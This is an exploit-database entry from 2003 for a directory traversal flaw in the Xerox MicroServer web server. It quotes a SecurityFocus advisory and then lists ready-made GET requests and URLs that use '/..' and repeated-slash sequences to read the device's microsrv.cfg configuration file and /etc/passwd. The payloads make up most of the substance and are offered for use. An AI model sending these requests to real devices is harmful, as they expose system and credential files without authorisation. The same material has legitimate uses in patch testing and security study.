Xerox MicroServer - Web Server Directory Traversal
| EKU-ID: 28894 | CVE: | OSVDB-ID: |
| Author: J.A. Gutierrez | Published: 2003-12-19 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 28894 | CVE: | OSVDB-ID: |
| Author: J.A. Gutierrez | Published: 2003-12-19 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/9256/info It has been reported that Xerox_MicroServer/Xerox11 may be prone to a directory traversal vulnerability that may allow an attacker to traverse outside the server root directory by using '/..' or '/.' character sequences at the end of a URL request. GET /assist/.. GET /assist/////.././../../. http://www.example.com////../../data/config/microsrv.cfg http://www.example.com////////../../../../../../etc/passwd